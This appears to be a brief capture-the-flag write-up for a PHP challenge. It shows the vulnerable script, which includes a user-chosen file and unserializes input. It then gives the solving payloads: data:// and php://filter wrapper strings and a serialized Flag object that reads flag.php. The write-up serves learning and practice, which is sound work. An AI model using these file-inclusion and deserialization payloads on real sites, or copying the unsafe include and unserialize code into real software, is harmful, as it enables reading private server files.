Copy <? php
$text = $_GET[ "text" ];
$file = $_GET[ "file" ];
$password = $_GET[ "password" ];
if ( isset ( $text ) && ( file_get_contents ( $text , 'r' ) === "welcome to the zjctf" )){
echo "<br><h1>" . file_get_contents ( $text , 'r' ) . "</h1></br>" ;
if ( preg_match ( "/flag/" , $file ) ){
echo "Not now!" ;
exit ();
} else {
include ($file); //useless.php
$password = unserialize ( $password ) ;
echo $password;
}
}
else {
highlight_file ( __FILE__ ) ;
}
?>
Copy ?text=data://text/plain,welcome to the zjctf
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
Copy file=php://filter/convert.base64-encode/resource=useless.php
Copy <? php
class Flag { //flag.php
public $file;
public function __tostring (){
if ( isset ( $this -> file ) ){
echo file_get_contents ( $this -> file ) ;
echo "<br>" ;
return ( "U R SO CLOSE !///COME ON PLZ" );
}
}
}
?>
定义了一个类Flag,以及类中存在一个魔术方法__tostring(),分析该魔术方法可得,如果该文件设置了 $file 属性,则进行文件包含,并输出文件的内容。
Copy O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}